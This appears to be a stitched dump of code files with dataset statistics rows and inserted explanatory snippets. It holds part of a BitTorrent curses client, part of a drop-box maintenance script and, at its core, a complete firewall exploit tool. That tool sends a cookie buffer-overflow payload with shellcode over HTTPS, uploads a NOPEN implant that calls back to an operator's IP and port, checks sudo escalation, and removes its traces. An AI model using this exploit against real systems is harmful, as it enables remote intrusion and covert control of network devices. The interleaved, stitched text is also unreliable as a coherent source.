self.spewwin.addnstr(i+3, 50, '-------', 7)
if dl[2]:
self.spewwin.addnstr(i+3, 51, 'I', 1)
if dl[3]:
self.spewwin.addnstr(i+3, 53, 'C', 1)
if dl[4]:
self.spewwin.addnstr(i+3, 55, 'S', 1)
self.spewwin.addnstr(i+3, 58, '%5.1f%%' % (int(spew[i]['completed']*1000)/10), 6)
if spew[i]['speed'] is not None:
self.spewwin.addnstr(i+3, 64, '%5.0f KB/s' % (spew[i]['speed']/1000), 10)
self.spewwin.addnstr(self.spewh-1, 0,
_("downloading %d pieces, have %d fragments, "
"%d of %d pieces completed") %
(statistics['storage_active'], statistics['storage_dirty'],
statistics['storage_numcomplete'], self.numpieces),
self.speww-1)
curses.panel.update_panels()
curses.doupdate()
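The spew-window scrolling above advances `spew_scroll_pos` and rotates the peer list via slice concatenation (`spew[pos:] + spew[:pos]`). A minimal standalone sketch of that rotation (names here are illustrative, not from the client):

```python
def rotate(rows, pos):
    """Rotate a list so that rows[pos] becomes the first visible row."""
    pos %= max(len(rows), 1)  # keep the offset inside the list
    return rows[pos:] + rows[:pos]

peers = ['peer-a', 'peer-b', 'peer-c', 'peer-d']
print(rotate(peers, 2))  # ['peer-c', 'peer-d', 'peer-a', 'peer-b']
```

The client resets the offset to 0 once it walks past the end, which is the same wrap-around the modulo expresses here.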
class DL(Feedback):
def __init__(self, metainfo, config, errlist):
self.doneflag = threading.Event()
self.metainfo = metainfo
self.config = Preferences().initWithDict(config)
self.errlist = errlist
def run(self, scrwin):
def reread():
self.multitorrent.rawserver.external_add_task(self.reread_config,0)
def ulrate(value):
self.multitorrent.set_option('max_upload_rate', value)
self.torrent.set_option('max_upload_rate', value)
self.d = CursesDisplayer(scrwin, self.errlist, self.doneflag, reread, ulrate)
try:
self.multitorrent = Multitorrent(self.config, self.doneflag,
self.global_error)
# raises BTFailure if bad
metainfo = ConvertedMetainfo(bdecode(self.metainfo))
torrent_name = metainfo.name_fs
if config['save_as']:
if config['save_in']:
raise BTFailure(_("You cannot specify both --save_as and "
"--save_in"))
saveas = config['save_as']
elif config['save_in']:
saveas = os.path.join(config['save_in'], torrent_name)
else:
saveas = torrent_name
self.d.set_torrent_values(metainfo.name, os.path.abspath(saveas),
metainfo.total_bytes, len(metainfo.hashes))
self.torrent = self.multitorrent.start_torrent(metainfo,
Preferences(self.config), self, saveas)
except BTFailure, e:
errlist.append(str(e))
return
self.get_status()
self.multitorrent.rawserver.install_sigint_handler()
self.multitorrent.rawserver.listen_forever()
self.d.display({'activity':_("shutting down"), 'fractionDone':0})
self.torrent.shutdown()
def reread_config(self):
try:
newvalues = configfile.get_config(self.config, 'bittorrent-curses')
except Exception, e:
self.d.error(_("Error reading config: ") + str(e))
return
self.config.update(newvalues)
# The set_option call can potentially trigger something that kills
# the torrent (when writing this the only possibility is a change in
# max_files_open causing an IOError while closing files), and so
# the self.failed() callback can run during this loop.
for option, value in newvalues.iteritems():
self.multitorrent.set_option(option, value)
for option, value in newvalues.iteritems():
self.torrent.set_option(option, value)
def get_status(self):
self.multitorrent.rawserver.add_task(self.get_status,
self.config['display_interval'])
status = self.torrent.get_status(self.config['spew'])
self.d.display(status)
def global_error(self, level, text):
self.d.error(text)
def error(self, torrent, level, text):
self.d.error(text)
def failed(self, torrent, is_external):
self.doneflag.set()
def finished(self, torrent):
self.d.finished()
if __name__ == '__main__':
uiname = 'bittorrent-curses'
defaults = get_defaults(uiname)
metainfo = None
if len(sys.argv) <= 1:
printHelp(uiname, defaults)
sys.exit(1)
try:
config, args = configfile.parse_configuration_and_args(defaults,
uiname, sys.argv[1:], 0, 1)
torrentfile = None
if len(args):
torrentfile = args[0]
for opt in ('responsefile', 'url'):
if config[opt]:
print '"--%s"' % opt, _("deprecated, do not use")
torrentfile = config[opt]
if torrentfile is not None:
metainfo, errors = GetTorrent.get(torrentfile)
if errors:
raise BTFailure(_("Error reading .torrent file: ") + '\n'.join(errors))
else:
raise BTFailure(_("you must specify a .torrent file"))
except BTFailure, e:
print str(e)
sys.exit(1)
errlist = []
dl = DL(metainfo, config, errlist)
curses_wrapper(dl.run)
if errlist:
print _("These errors occurred during execution:")
for error in errlist:
print error
| 38.988914 | 145 | 0.556187 | 2,041 | 17,584 | 4.709456 | 0.210681 | 0.025177 | 0.035581 | 0.027674 | 0.171036 | 0.117457 | 0.085518 | 0.053891 | 0.025177 | 0 | 0 | 0.02373 | 0.319381 | 17,584 | 450 | 146 | 39.075556 | 0.779412 | 0.052491 | 0 | 0.140212 | 0 | 0 | 0.09476 | 0 | 0 | 0 | 0 | 0 | 0.002646 | 0 | null | null | 0.005291 | 0.058201 | null | null | 0.029101 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4e869698fe814d3a243ff2da3c5d64b703b2798 | 24,526 | py | Python | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 46 | 2017-05-15T11:15:08.000Z | 2018-07-02T03:32:52.000Z | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | null | null | null | TAO/Firewall/EXPLOITS/ELBO/eligiblebombshell_1.2.0.1.py | dendisuhubdy/grokmachine | 120a21a25c2730ed356739231ec8b99fc0575c8b | [
"BSD-3-Clause"
] | 24 | 2017-05-17T03:26:17.000Z | 2018-07-09T07:00:50.000Z | #!/usr/bin/python
import shellcode
import optparse
import httplib
import logging
import random
import socket
import sys
import re
from struct import pack, unpack
from time import sleep
########################
# Global configuration #
########################
DEFAULT_ETAG_FILE = "ELBO.config"
VERSION = "%prog v1.0.0.0"
####################################################################
# Add support for python 2.3 and 2.4 #
####################################################################
# 2.3 introduced Set, so anything older won't work anyway
# 2.4 introduced the set builtin, so anything newer works fine
if sys.version_info[0] <= 2 and sys.version_info[1] <= 3:
import sets
set = sets.Set
# "any" was introduced in 2.5
if sys.version_info[0] == 2 and sys.version_info[1] < 5:
def any(iterable):
for e in iterable:
if e:
return True
return False
#####################
# Support functions #
#####################
def read_etag_file(options):
"""Returns a nested dictionary of the form:
{ etag-string: { "stack" : stack-address,
"version": software-version },
... }"""
tags = dict()
noserver = None
have_errors = False
options.scanplan = []
# split etag into its components
(inode, size, timestamp) = [int(x, 16) for x in options.etag.split("-")]
logging.info("Parsed ETag: inode=%d, filesize=%d, timestamp=%#x" %
(inode, size, timestamp))
fh = file(options.etag_file)
for line in [x.strip() for x in fh.readlines()]:
line = re.sub("\s*#.*", "", line) # remove trailing comments
if len(line) == 0: continue # skip blank lines
m1 = re.match("ETAG\s*=\s*(.+)", line)
m2 = re.match("NOSERVER\s*=\s*(.+)", line)
m3 = re.match("SCANPLAN\s*=\s*(.+)", line)
if not (m1 or m2 or m3):
print "ERROR: invalid line in etag file: [%s]" % line
have_errors = True
continue
if m1: # an "ETAG = ..." line
fields = dict(zip(["etag", "action", "stack", "version"],
[x.strip() for x in m1.group(1).split(":")]))
if len(fields) == 3:
fields["version"] = "unknown"
elif len(fields) != 4:
print "ERROR: invalid line in etag file: [%s]" % line
have_errors = True
continue
# skip actions that don't match the --action command line argument
if options.action not in fields["action"]:
logging.debug("Skipping configuration [%s:%s] due to --action" %
(fields["etag"], fields["action"]))
continue
# convert hex numbers to actual numbers (not strings)
if fields["stack"].startswith("0x"):
fields["stack"] = long(fields["stack"], 16)
if fields["etag"] not in tags:
tags[fields["etag"]] = []
tags[fields["etag"]].append(dict(action=fields["action"],
stack=fields["stack"],
version=fields["version"]))
elif m2: # a "NOSERVER = ..." line
noserver = m2.group(1)
elif m3: # a "SCANPLAN = ..." line
fields = dict(zip(["action","low","high","addrs"],
[x.strip() for x in m3.group(1).split(":")]))
if options.action not in fields["action"]:
logging.debug("Skipping scanplan [%s:%s:%s] due to --action" %
(fields["action"], fields["low"], fields["high"]))
continue
fields["low"] = long(fields["low"], 16)
fields["high"] = long(fields["high"], 16)
addrs = [x.strip() for x in fields["addrs"].split(",")]
addrs = [x.startswith("0x") and long(x,16) or x for x in addrs]
# if the etag we want to hit is in this SCANPLAN, add it
if timestamp >= fields["low"] and timestamp <= fields["high"]:
scanplan = [dict(action=fields["action"], stack=x)
for x in addrs]
if options.maxfailsaction > 0:
options.scanplan += scanplan[:options.maxfailsaction]
else:
options.scanplan += scanplan
fh.close()
if have_errors:
sys.exit(1)
return (tags, noserver)
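The function above splits an Apache-style ETag into three hex-encoded fields (inode, file size, mtime). The parsing step on its own, with a made-up tag value:

```python
def parse_etag(etag):
    """Split an 'inode-size-timestamp' ETag into integers (fields are hex)."""
    inode, size, timestamp = (int(x, 16) for x in etag.split("-"))
    return inode, size, timestamp

print(parse_etag("1a2b-3c4d-5e6f"))  # (6699, 15437, 24175)
```

The timestamp field is what the SCANPLAN ranges in the config file are matched against.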
def get_details_for_etag(options):
"""Get the stack address for a specific ETag from the configuration file."""
(tags, noserver) = read_etag_file(options)
if noserver and not options.noserver:
options.noserver = noserver
# strip off wacky W/ and quotes (if they're there)
m = re.match('(?:W/)?"?(.*)"?$', options.etag)
if m:
options.etag = m.group(1)
etag = options.etag
# look for an exact match
if etag in tags:
print "Found etag [%s] for version %s" % (etag,tags[etag][0]['version'])
return tags[etag]
# didn't find exact match - strip off the inode part and check again
short = etag[etag.index("-"):]
for t in tags:
if t.find(short) != -1:
print "Partial ETag match: [%s],[%s] for version %s" % \
(etag, t, tags[t][0]['version'])
return tags[t]
return None
def encode(string):
"""Encode string argument (XOR with a mask byte) to remove any
forbidden characters."""
bad = ['\x00', '\t', ' ', '\r', '\n']
start = random.randint(1, 255)
maskb = (start + 1) & 0xff
while maskb != start:
if chr(maskb) in bad:
maskb = (maskb + 1) & 0xff
continue
# mask all arguments
string = "".join(map(lambda x: chr(maskb ^ ord(x)), string))
# see if we got rid of all bad characters
if not any([x in string for x in bad]):
return (maskb, string)
# unmask for next try
string = "".join(map(lambda x: chr(maskb ^ ord(x)), string))
# incr mask
maskb = (maskb + 1) & 0xff
raise Exception("Could not find valid mask byte.")
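`encode()` searches for a single XOR mask byte that leaves none of the forbidden bytes (NUL, tab, space, CR, LF) in the masked payload. A simplified sketch of the same idea on bytes rather than Python 2 strings (hypothetical helper, not the exploit's exact code):

```python
BAD = {0x00, 0x09, 0x20, 0x0d, 0x0a}  # NUL, tab, space, CR, LF

def xor_mask(data):
    """Return (mask, masked) such that masked contains no forbidden bytes."""
    for mask in range(1, 256):
        if mask in BAD:
            continue  # the mask itself must also be a clean byte
        masked = bytes(b ^ mask for b in data)
        if not any(b in BAD for b in masked):
            return mask, masked
    raise ValueError("no valid mask byte")

mask, masked = xor_mask(b"mov eax, 4")
original = bytes(b ^ mask for b in masked)  # unmasking is the same XOR
```

Because XOR is its own inverse, the decoder stub only needs the mask byte to recover the payload in place.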
def build_payload(options, address, libc):
"""Build the exploit cookie + post data payload."""
if options.op == "scan":
body = shellcode.probe
elif options.op == "nopen":
body = shellcode.nopen
# fill in noserver file length and callback ip/port
body = body[:2] + \
pack("<I", len(shellcode.tiny_exec)) + \
pack("<I", len(options.nopen)) + \
pack("35s", "D=-c%s" % options.callback_ip) + \
body[45:]
elif options.op == "cleanup":
body = shellcode.cleanup
else:
raise Exception("ERROR: Invalid operation specified.")
if libc:
cookie = shellcode.auth_id
bodylen = len(body)
if bodylen > 0xffff:
raise Exception("body must be <= 0xffff bytes long")
# fill in bodylen in auth_id shellcode
if (bodylen & 0xff00) == 0:
cookie = cookie[:10] + "\x90\x90" + cookie[12:]
else:
cookie = cookie[:11] + chr((bodylen & 0xff00) >> 8) + cookie[12:]
if (bodylen & 0xff) == 0:
cookie = cookie[:12] + "\x90\x90" + cookie[14:]
else:
cookie = cookie[:13] + chr(bodylen & 0xff) + cookie[14:]
if len(cookie) > 60:
raise Exception("ERROR: Cookie shellcode must be <= 60 bytes!")
cookie = "auth_id=" + chr(0x90)*(60 - len(cookie)) + cookie
cookie += pack("<I", address)
else:
decoder = shellcode.decoder
execute = shellcode.execute_post
exec_len = pack("<I", len(execute))
deco_len = pack("<I", len(decoder))
body_len = pack("<I", len(body))
# replace 0xdeadbeef with actual body length
execute = execute[:7] + body_len + execute[11:]
(maskb, string) = encode(execute + exec_len + deco_len)
execute = string[:-8]
exec_len = string[-8:-4]
deco_len = string[-4:]
maskw = chr(maskb)*4
decoder = decoder[0] + deco_len + decoder[5] + maskw + \
decoder[10:15] + exec_len + decoder[19:21] + maskw + \
decoder[25:29] + chr(maskb) + decoder[30:]
cookie = shellcode.finder + decoder + execute
if len(cookie) > 1036:
raise Exception("ERROR: Cookie shellcode must be <= 1036 bytes!")
sled_len = (1036 - len(cookie)) # 1036 = buffer len to overflow
logging.info("Using decoder masking byte %#x" % maskb)
logging.info("Using %d-byte NOP sled" % sled_len)
cookie = chr(0x90)*sled_len + cookie + pack("<I", address)
if options.op == "nopen":
return (cookie, body + options.nopen + shellcode.tiny_exec)
else:
return (cookie, body)
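In the libc branch above, the 16-bit body length is patched into the cookie shellcode one byte at a time, and a byte that would be zero is replaced with NOPs (`\x90\x90`) instead of embedding `\x00`. The byte-splitting on its own (a sketch; `None` stands in for the NOP substitution):

```python
def length_bytes(bodylen):
    """Split a 16-bit length into (high, low); None marks a zero byte
    that the shellcode pads with NOPs instead of embedding \\x00."""
    assert bodylen <= 0xffff
    high = (bodylen & 0xff00) >> 8
    low = bodylen & 0xff
    return (high or None, low or None)

print(length_bytes(0x0100))  # (1, None) - low byte is zero
```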
def get_response(options, address):
"""Send an exploit to the target and get its response."""
# some addresses are fake, so we remap them here
remap_addr = { 'libc.0': 0x0804a625L, 'libc.1': 0x2aab757c }
method = "GET"
if address["stack"] in remap_addr:
real_addr = remap_addr[address["stack"]]
(cookie, body) = build_payload(options, real_addr, libc=True)
else:
(cookie, body) = build_payload(options, address["stack"], libc=False)
conn = httplib.HTTPSConnection(options.target_ip, options.port)
if logging.getLogger().level <= logging.DEBUG:
if len(body) + len(cookie) > 10240:
logging.debug("WARNING: debug mode selected, but the amount of " +
"data being sent to the server is large (> 10kb). " +
"Temporarily disabling debug output.")
else:
conn.set_debuglevel(3)
logging.info("Sending %s request (%d-byte cookie) to https://%s:%s%s" %
(method, len(cookie), options.target_ip, options.port,
address["action"]))
try:
conn.request(method, address["action"], body=body,
headers={"Cookie": cookie})
except socket.error, e:
print "Connection error %d: %s" % tuple(e)
sys.exit(1)
return conn.getresponse()
####################
# "Main" functions #
####################
def scan(options):
"""Scan for which vulnerability / stack address to use"""
addrs = get_details_for_etag(options)
if addrs is None:
addrs = options.scanplan
if options.maxfails > 0:
addrs = addrs[:options.maxfails]
else:
logging.info("--scan initiated against a known version: Only " +
"sending one scan (expect success!)")
logging.debug("scanplan = [" +
",".join(["(%s, %s)" % (x["action"],
type(x["stack"]) == long and \
("%#010x" % x["stack"]) or \
x["stack"])
for x in addrs]) +
"]")
if len(addrs) == 0:
print "ERROR: No valid SCANPLAN found for your ETag. If you supplied an --action argument, try again without it. Otherwise, contact a developer."
return
skip_404 = dict() # CGI's that aren't on the target
for (i,addr) in enumerate(addrs):
logging.info("------------------------------------------------")
if type(addr["stack"]) == str:
print "Attempt %d of %d: Trying return to %s against %s" % \
(i+1, len(addrs), addr["stack"], addr["action"])
else:
print "Attempt %d of %d: Trying stack addr %#010x against %s" % \
(i+1, len(addrs), addr["stack"], addr["action"])
cgi_name = addr["action"][:addr["action"].find("?")]
if cgi_name in skip_404:
logging.info("... skipped due to HTTP %d" % skip_404[cgi_name])
continue
resp = get_response(options, addr)
logging.info(" received HTTP %s %s" % (resp.status, resp.reason))
if resp.status == 200:
address = addr
break
if resp.status >= 300 and resp.status < 500:
skip_404[cgi_name] = resp.status
logging.info("Skipping all future scans against %s due to HTTP status" % cgi_name)
sleep(options.delay)
if resp.status != 200:
if len(addrs) == 1 and options.maxfails != 1:
print "ERROR: Vulnerability parameter recorded in %s FAILED." % \
options.etag_file
print " Try deleting the entry and running --scan again."
else:
print "All scans failed. No vulnerability found."
return
data = resp.read()
logging.debug("received data(%d): %s" % (len(data), repr(data)))
if len(data) < 16:
print "ERROR: Expected at least 16 bytes from exploit, but only " + \
"got %d" % len(data)
return
code_ack = 0xc0edbabeL
code_sudo = 0x900d50d0L
code_nosudo = 0xbad500d0L
code_root = 0xb00500d0L
code_exec = 0xbaade7ecL
(ack, stack, euid, sudo) = unpack("<IIII", data[:16])
if ack == code_ack:
data = data[16:]
print "Received ACK from exploit payload."
print "================================================="
print "Effective UID: %d" % euid
if sudo == code_sudo:
print "/tos/bin/sudo appears to be available."
print "Output of '/tos/bin/sudo /usr/bin/id':"
if unpack("<I", data[:4])[0] == code_exec:
print " ERROR: execve() failed!"
else:
print data
data = ""
elif sudo == code_nosudo:
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
print "/tos/bin/sudo is NOT available!"
print "May not be able to escalate privileges!"
print "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
elif sudo == code_root:
print "Already root, so skipping sudo check"
else:
print "Unknown sudo status: got %#x but expected %#x or %#x" % \
(sudo, code_sudo, code_nosudo)
if len(data):
print "Received unexpected data:", repr(data)
print "================================================="
if type(address["stack"]) == str:
print "Successful libc exploit."
config_line = " ETAG = %s : %s : %s" % \
(options.etag, address["action"], address["stack"])
else:
print "Successful probe stack address: %#010x" % address["stack"]
print "Exact stack address : %#010x" % stack
config_line = " ETAG = %s : %s : %#010x" % \
(options.etag, address["action"], stack)
if len(addrs) == 1:
print "Vulnerability for ETag [%s] confirmed!" % options.etag
else:
print "Add this line to %s:" % options.etag_file
print config_line
print "and then add the version column when known."
else:
print "ERROR! Received invalid ack word [%#x] vs [%#x]" % (ack,code_ack)
print "received (%d): %s" % (len(data), repr(data))
print "Exploit failed."
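The 16-byte ack header parsed above is four little-endian 32-bit words (`unpack("<IIII", ...)`). The same round-trip in isolation, with representative values:

```python
from struct import pack, unpack

# build a header the way the payload would, then parse it back
header = pack("<IIII", 0xc0edbabe, 0xbffff000, 0, 0x900d50d0)
ack, stack, euid, sudo = unpack("<IIII", header)
print(hex(ack))  # 0xc0edbabe
```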
def nopen(options):
"""Upload noserver to the target and have it call back"""
addr = get_details_for_etag(options)
if addr is None:
logging.error("ERROR: No entry for ETag [%s] in %s." %
(options.etag, options.etag_file))
logging.error(" Perhaps you should run with --scan?")
return
if not options.noserver:
options.parser.error("--nopen also requires -n/--noserver or a " +
"NOSERVER entry in %s" % options.etag_file)
if not options.callback_ip:
options.parser.error("--nopen also requires -c/--callback!")
try:
fh = file(options.noserver)
options.nopen = fh.read()
fh.close()
except (IOError, OSError):
print "ERROR: Could not read noserver file [%s]" % (options.noserver)
return
codes = {
0xdeadbeefL: "Received ACK from exploit. Uploading NOPEN.",
0xc0edbabeL: "Uploaded NOPEN! Callback commencing.",
0x00000001L: "ERROR: Could not read POSTed NOPEN binary.",
0x00000002L: "ERROR: Could not write NOPEN binary to target disk.",
0x00000003L: "ERROR: Unexpected EOF while uploading NOPEN binary.",
0x00000004L: "ERROR: Could not open() upload filename on target.",
0x00000005L: "ERROR: execve() on uploaded NOPEN binary failed.",
0x00000006L: "warning: Could not close() uploaded file on target. Continuing anyway. (Is there another NOPEN session already alive?)",
0x00000007L: "warning: sudo failed! Running NOPEN as nobody.",
}
resp = get_response(options, addr[0])
while True:
try:
data = resp.read(4)
except ValueError:
break
if len(data) == 0:
break
logging.debug("received data(%d): %s" % (len(data), repr(data)))
code = unpack("<I", data)[0]
if code in codes:
print codes[code]
else:
print "ERROR: Unknown status code %#010x" % code
data += resp.read()
print data
break
def cleanup(options):
"""Try to delete uploaded files from the target"""
# extract uploaded filenames from shellcode
null0 = shellcode.cleanup.index("\x00")
null1 = shellcode.cleanup.index("\x00", null0+1)
noserver_upload = shellcode.cleanup[2:null0]
tinyexec_upload = shellcode.cleanup[null0+1:null1]
codes = {
0x00000002L: "ERROR: unlink('%s') (%s) - cleanup NOT successful - file is still sitting on target!",
0x00000100L: "success: stat('%s') (%s) - file is sitting on target",
0x00000200L: "success: unlink('%s') (%s) - file removed from target",
}
masks = {
0x00010000L: (noserver_upload, 'noserver'),
0x00020000L: (tinyexec_upload, 'tiny-exec'),
}
orig_codes = codes.keys()
for m in masks:
for c in orig_codes:
codes[m ^ c] = codes[c] % masks[m]
for c in orig_codes:
del codes[c]
codes[0x00010001L] = "warning: stat() on '%s' (noserver) failed - file not uploaded? This may be normal if the exploit upload failed or the file was deleted manually." % noserver_upload
codes[0x00020001L] = "warning: stat() on '%s' (tiny-exec) failed - file not uploaded? This may be normal if the exploit upload failed, the file was deleted manually, or we did not need to upload tiny-exec (i.e., we were already running as EUID root)." % tinyexec_upload
addr = get_details_for_etag(options)
if addr is None:
logging.error("ERROR: No entry for ETag [%s] in %s." %
(options.etag, options.etag_file))
logging.error(" Perhaps you should run with --scan?")
return
resp = get_response(options, addr[0])
data = resp.read()
logging.debug("received data(%d): %s" % (len(data), repr(data)))
if len(data) % 4 != 0:
print "ERROR: Expected 4-byte status codes but got %d bytes:"%len(data)
print repr(data)
return
from_exploit = unpack("<" + ("I" * (len(data)/4)), data)
for code in from_exploit:
if code in codes:
print codes[code]
else:
print "ERROR: Unknown status code %#010x" % code
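`cleanup()` composes its status-code table by XORing each per-file mask into the base codes, so one message template serves both uploaded files. A compact illustration of that composition (toy codes, not the real table):

```python
base = {0x100: "stat ok", 0x200: "unlink ok"}
masks = {0x10000: "noserver", 0x20000: "tiny-exec"}

# cross product: one entry per (file mask, base code) pair
codes = {m ^ c: "%s: %s" % (name, msg)
         for m, name in masks.items()
         for c, msg in base.items()}

print(codes[0x10200])  # "noserver: unlink ok"
```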
def main():
"""Parse command line arguments"""
def handle_op_arg(option, opt_str, value, parser, opname):
if parser.values.op:
raise optparse.OptionValueError(
"Only one of --probe, --scan, --nopen, or --cleanup should " +
"be supplied")
parser.values.op = opname
parser = optparse.OptionParser(version=VERSION, usage="""%prog [options]
See -h for specific options (some of which are required).
Examples:
Scan to find (unknown versions) or confirm (known versions) vulnerability:
%prog -t 1.2.3.4 -e 012-345-6789 --scan -v
Once a valid entry is in ELBO.config, upload nopen:
%prog -t 1.2.3.4 -e 012-345-6789 --nopen -n noserver -c 5.6.7.8:12345 -v
Delete uploaded files from the previous step:
%prog -t 1.2.3.4 -e 012-345-6789 --cleanup -v""")
parser.add_option("-t", "--target-ip", dest="target_ip", action="store",
type="string", help="Target's IP address")
parser.add_option("-e", "--etag", dest="etag", action="store",
type="string", help="Target's ETag string")
parser.add_option("--scan", dest="op", action="callback",
callback=handle_op_arg, callback_args=("scan",),
help="Scan for vulnerability parameters")
parser.add_option("--delay", dest="delay", action="store", type="int",
default=1, help="Delay in seconds between probes " +
"during --scan (default=1 second)")
parser.add_option("-f", "--max-fails", dest="maxfails", action="store",
type="int", default=0, help="Total maximum number of " +
"failed scan attempts before aborting (default=0, run " +
"all scans); see also --max-fails-action")
parser.add_option("--max-fails-action", dest="maxfailsaction",
action="store", type="int", default=0, help="Maximum " +
"number of failed scan attempts on a single target " +
"CGI action before moving on to the next (default=0, " +
"run all scans)")
parser.add_option("--nopen", dest="op", action="callback",
callback=handle_op_arg, callback_args=("nopen",),
help="Upload NOPEN to target (requires -n and -c)")
parser.add_option("-n", "--noserver", dest="noserver", action="store",
type="string", help="Path to static noserver binary " +
"(overrides NOSERVER setting in %s)" % DEFAULT_ETAG_FILE)
parser.add_option("-c", "--callback", dest="callback_ip", action="store",
type="string", help="Callback IP:Port for --nopen " +
"(e.g., 127.0.0.1:12345)")
parser.add_option("--cleanup", dest="op", action="callback",
callback=handle_op_arg, callback_args=("cleanup",),
help="Try to delete uploaded files from target")
parser.add_option("-p", "--port", dest="port", action="store", type="int",
default=443, help="Destination port (default=443)")
parser.add_option("--config", dest="etag_file", action="store",
type="string", default=DEFAULT_ETAG_FILE,
help="ETag configuration file (default=%s)" %
DEFAULT_ETAG_FILE)
parser.add_option("-v", "--verbose", dest="verbose", action="store_true",
help="Turn on verbose output")
parser.add_option("-d", "--debug", dest="debug", action="store_true",
help="Turn on debugging output")
parser.add_option("--action", dest="action", action="store", type="string",
default="", help="Only try actions from ELBO.config " +
"that contain ACTION as a substring")
(options, args) = parser.parse_args()
if len(args) != 0:
parser.error("invalid arguments")
# make sure we have a target IP and his ETag
if not options.target_ip:
parser.error("-t/--target-ip is required!")
if not options.etag:
parser.error("-e/--etag is required!")
# handle -v and -d via logging module
level = logging.ERROR
if options.verbose:
level = logging.INFO
if options.debug:
level = logging.DEBUG
logging.basicConfig()
logging.getLogger().setLevel(level)
logging.getLogger().handlers[0].setFormatter(logging.Formatter("%(msg)s"))
options.parser = parser
# dispatch to the correct operation
if not options.op:
parser.error("One of --scan, --nopen, or --cleanup must " +
"be supplied")
dispatch = dict()
for func in [scan, nopen, cleanup]:
dispatch[func.func_name] = func
dispatch[options.op](options)
return
if __name__ == '__main__':
main()
| 39.430868 | 273 | 0.544157 | 2,929 | 24,526 | 4.504268 | 0.185388 | 0.002577 | 0.017055 | 0.009551 | 0.207004 | 0.162056 | 0.12355 | 0.103388 | 0.103388 | 0.103388 | 0 | 0.029365 | 0.304371 | 24,526 | 621 | 274 | 39.494364 | 0.743919 | 0.049865 | 0 | 0.187891 | 0 | 0.016701 | 0.276007 | 0.011802 | 0 | 0 | 0.002772 | 0 | 0 | 0 | null | null | 0 | 0.022965 | null | null | 0.093946 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4f1604ce9428d0115f6455fe8e1046bdd00fa11 | 5,910 | py | Python | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2019-01-21T12:41:40.000Z | 2019-01-21T12:41:40.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | 1 | 2017-12-27T18:13:30.000Z | 2018-01-26T11:44:35.000Z | application/briefkasten/commands.py | tomster/briefkasten | 8de5eccd258b6f8c5884cf24596469389ffa48ff | [
"BSD-3-Clause"
] | null | null | null | import click
from os import path, listdir, rename, remove
from datetime import datetime
from sys import exit
from multiprocessing import Pool
from signal import signal, SIGINT
from watchdog.observers import Observer
from watchdog.events import FileSystemEventHandler
from threading import Condition
from .dropbox import DropboxContainer
class MyHandler(FileSystemEventHandler):
def __init__(self, main_loop_cond):
self.main_loop_cond = main_loop_cond
def on_modified(self, event):
self.main_loop_cond.acquire()
self.main_loop_cond.notify()
self.main_loop_cond.release()
def keyboard_interrupt_handler(signal, frame):
print('Caught keyboard interrupt. Exit.')
exit(0)
def run_watchdog():
# once a day we should scan for old drop boxes
# at noon we should test pgp keys
# also: scan for and clean up watchdog entries
pass
def process_drop(drop):
try:
rename(
path.join(drop.container.fs_submission_queue, drop.drop_id),
path.join(drop.container.fs_scratch, drop.drop_id)
)
except OSError:
return
drop.process()
# remove token from scratch dir, we're done
remove(path.join(drop.container.fs_scratch, drop.drop_id))
@click.command(help='performs sanity and config checks and cleans up old drops')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
def janitor(root): # pragma: no cover
drop_root = DropboxContainer(root=root)
# Scan pub keys for expired or soon-to-expire ones
allkeys = drop_root.gpg_context.list_keys()
now = datetime.utcnow()
report = ''
for editor in drop_root.settings['editors']:
key = [k for k in allkeys if editor in ', '.join(k['uids'])]
if not bool(key):
report = report + 'Editor %s does not have a public key in keyring.\n' % editor
continue
key = key[0]
if not key.get('expires'):
report = report + 'Editor %s has a key that never expires.\n' % editor
continue
keyexpiry = datetime.utcfromtimestamp(int(key['expires']))
delta = keyexpiry - now
if delta.days < 0:
report = report + 'Editor %s has an expired key.\n' % editor
elif delta.days < 60:
report = report + 'Editor ' + editor + ' has a key that will expire in %d days.\n' % delta.days
for drop in drop_root:
age = now - drop.last_changed()
max_age = 365 if not drop.from_watchdog else 1
if age.days > max_age:
if not drop.from_watchdog:
print('drop %s is expired. Removing it.' % drop)
drop.destroy()
@click.command(help='debug processing of drops')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
@click.argument(
'drop_id',
required=False,
default=None,
)
def debug(root, drop_id=None): # pragma: no cover
drop_root = root = DropboxContainer(root=root)
if drop_id is not None:
drops = [drop_root.get_dropbox(drop_id)]
else:
drops = drop_root
for drop in drops:
print('debugging %s' % drop)
if drop.status_int == 20:
drop.process()
@click.command(help='Scans dropbox submission directory for unprocessed drops and processes them')
@click.option(
'--root',
'-r',
default='var/drop_root/',
help='''location of the dropbox container directory''')
def debug_worker(root): # pragma: no cover
drop_root = DropboxContainer(root=root)
while True:
for drop_id in listdir(drop_root.fs_submission_queue):
print(drop_id)
drop = drop_root.get_dropbox(drop_id)
# Only look at drops that actually are for us
if drop.status_int == 20:
process_drop(drop)
else:
print('Not processing drop %s with status %d ' % (drop.drop_id, drop.status_int))
